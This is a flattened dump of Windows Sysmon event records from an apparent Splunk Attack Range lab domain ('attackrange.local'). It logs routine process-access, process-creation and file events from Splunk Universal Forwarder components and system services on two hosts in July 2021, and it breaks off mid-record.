10341000x8000000000000000810091Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810090Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810089Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F800-60EB-D579-00000000D001}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810088Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F800-60EB-D579-00000000D001}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810087Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.283{0C1E0330-F800-60EB-D579-00000000D001}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810130Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.940{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C000CD29485FE1A08BA82BE61D64EFD,SHA256=9A8FB8A104C5E820D7ADE20AFA12DFC347244F720CE73ED8079147ADB8FA22DE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:25.656{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A042F9B9C3420E1B077854A8272947FB,SHA256=A879DD15AB94A0A035C515914A19CDBE3A6C463A5234469619A9DF5E90A379E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810129Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F801-60EB-D779-00000000D001}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810128Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810127Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810126Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810125Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810124Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810123Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810122Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810121Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810120Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810119Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F801-60EB-D779-00000000D001}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810118Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F801-60EB-D779-00000000D001}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810117Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.533{0C1E0330-F801-60EB-D779-00000000D001}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810116Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.516{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0D89CBF506CB439219E8F32451D302F,SHA256=D1824C29E002FE360C73B70AFC3610E7134496CB1E5986FD374B4505895BE940,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810115Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.516{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA17D342B34E15C67877BF30895DBC19,SHA256=CC1F4D49567C5F372DA16B200686AEB0355CBA15BA89535D8C06BB5F967BD597,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:26.671{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8DBC4D7C633C1B6639FD47926FF1CE4,SHA256=02C9BEF0C9934FBDF85B6425B11ADE745D099447A1222DB20E42AE950AD219CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810157Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F802-60EB-D979-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810156Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810155Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810154Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810153Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810152Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810151Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 